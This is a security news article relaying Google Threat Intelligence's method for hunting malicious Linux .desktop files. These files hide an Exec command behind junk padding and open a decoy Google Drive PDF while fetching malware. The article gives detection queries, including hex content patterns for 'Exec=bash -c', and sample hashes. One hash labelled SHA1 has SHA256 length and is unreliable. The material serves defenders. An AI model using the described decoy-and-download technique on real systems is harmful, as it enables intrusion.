Google Threat Intelligence has introduced a new blog series to help security professionals with advanced threat hunting methods. The first post focuses on identifying malicious .desktop files in Linux systems.
What Are .Desktop Files?
.desktop files are plain text configuration files used in Linux desktop environments. They control how applications are launched and displayed. These files follow a standard format called the Desktop Entry Specification.
Typical .desktop files contain the following sections:
[Desktop Entry] Name=Application Name Comment=Short description Exec=/path/to/executable %U Icon=icon-name Terminal=false Type=Application Categories=Utility;Application;
New Threats: Malicious .Desktop Files
Google Threat Intelligence has found a new wave of malicious .desktop files. These files do not follow the standard structure. They often contain thousands of lines of junk code, using characters like # to hide their true function.
Hidden inside is a valid .desktop structure. The Exec key is used to run harmful commands when users double-click the file. One common trick involves opening a decoy PDF from Google Drive while secretly downloading malware in the background.
How the Attack Works
When opened, these malicious files use the xdg-open command to launch a PDF file from Google Drive. This usually happens in the system’s default browser, like Firefox, especially in the XFCE desktop environment.
The attack process includes:
- xdg-open: Detects the desktop environment and opens the file.
- exo-open: XFCE helper that passes the request.
- exo-helper-2: Launches Firefox with the Google Drive link.
This behavior offers security teams several chances to detect the attack. For example, spotting exo-helper-2 with Google Drive links is a clear sign of suspicious activity.
Threat Hunting Strategies
Google suggests using query-based methods to find these malicious files. The strategies combine behavior analysis, process tracking, and content inspection.
| Hunting Strategy | Query | Purpose |
|---|---|---|
| exo-helper-2 Processes | behavior_processes:”–launch WebBrowser” behavior_processes:”https://drive.google.com/” | Detects samples triggering Google Drive URLs in XFCE environments. |
| All URL-Opening Processes | (behavior:”xdg-open” or behavior:”exo-open” or behavior:”exo-helper-2″ or behavior:”gio open” or behavior:”kde-open”) and behavior_processes:”https://drive.google.com/” | Expands detection to GNOME and KDE environments. |
| xdg-open Artifacts (1) | behavior:”/usr/bin/grep grep -i ^xfce_desktop_window” filename:”*.desktop” | Finds .desktop files using xdg-open to detect XFCE environments. |
| xdg-open Artifacts (2) | behavior:”/usr/bin/grep grep -i ^xfce_desktop_window” behavior_processes:”https://drive.google.com/” | Combines XFCE detection with Google Drive behavior. |
| xdg-open Artifacts (3) | behavior:”/usr/bin/grep grep -i ^xfce_desktop_window” (behavior_processes:”https://drive.google.com/” or (behavior_processes:”http” behavior_processes:”.pdf”)) | Detects use of Google Drive or other PDF URLs. |
| Content-Based Detection | content:{45 78 65 63 3d 62 61 73 68 20 2d 63 20 22} content:{4e 61 6d 65 3d} content:{2e 70 64 66} content:{5b 44 65 73 6b 74 6f 70 20 45 6e 74 72 79 5d} | Targets strings in malicious .desktop files using hex patterns. |
| Generic .Desktop File Hunting | content:{5b4465736b746f7020456e7472795d}@0 p:1+ | Detects .desktop files acting as downloaders or loaders. |
Recent Malicious Samples
Google Threat Intelligence found several malicious .desktop files in 2025. These samples may be linked to a campaign reported by Zscaler, though this is not confirmed.
- Opportunity for Exercise, Re Exercise of Option for pay Fixation.desktop (SHA1: c2f0f011eabb4fae94e7a5973f1f05208e197db983a09e2f7096bcff69a794d1, April 30, 2025, India)
- Revised SOP for Webex Meeting – MOD.desktop (SHA1: 8d61ce3651eb070c8cdb76a334a16e53ad865572, April 15, 2025, India)
- Award Medal Declaration Form.desktop (SHA1: 1814730cb451b930573c6a52f047301bff0b84d1, April 8, 2025, Australia)
These files often appear in uploads from India and Australia. However, they may be using proxy servers to hide their true origin.
Conclusion
Google’s new blog series provides security teams with practical methods to hunt for malicious .desktop files. Using a mix of behavioral analysis, process monitoring, and content checks, defenders can find threats early.
The provided queries can be adjusted to fit different environments. As attackers keep changing their tactics, these strategies help defenders stay ahead of evolving threats.
